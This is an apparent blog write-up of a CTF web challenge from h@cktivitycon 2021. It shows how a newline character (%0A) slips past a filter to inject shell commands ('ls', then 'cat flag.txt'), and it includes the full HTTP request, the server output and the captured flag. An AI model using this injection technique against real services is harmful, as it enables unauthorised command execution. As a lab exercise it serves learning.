Fey - Security Blog

This is kinda the same the challenge than the previous one but, this time, there are some filters

A lot of caracters, are filtered but carriage return (\n) is not, this one could allow us to execute command

POST / HTTP/1.1
Host: challenge.ctf.games:30043
Content-Length: 22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.ctf.games:30043
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge.ctf.games:30043/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

file=/etc/hosts %0Als

[...]
<pre>
8f7a5367f3f5a0172149ec24619b75fc027235de6d59e0b2fa87287a10d279ef  /etc/hosts
flag.txt
main.py
requirements.txt
templates

</pre>
[...]

Nice, we can now get the flag.

file=/etc/hosts %0Acat flag.txt

[...]
<pre>
5a5d3fae93a05b3f1470b89da5ede6a015490b5513add0b5c666e55fddbe8bf9  /etc/hosts
flag{62b8b3cb5b8c6803bf3dc585b1b5141d}
</pre>
[...]

/ctfs/h@cktivitycon - 2021/web/integrity (n%c2%b02 command injection)

This is kinda the same the challenge than the previous one but, this time, there are some filters

A lot of caracters, are filtered but carriage return (\n) is not, this one could allow us to execute command

Nice, we can now get the flag.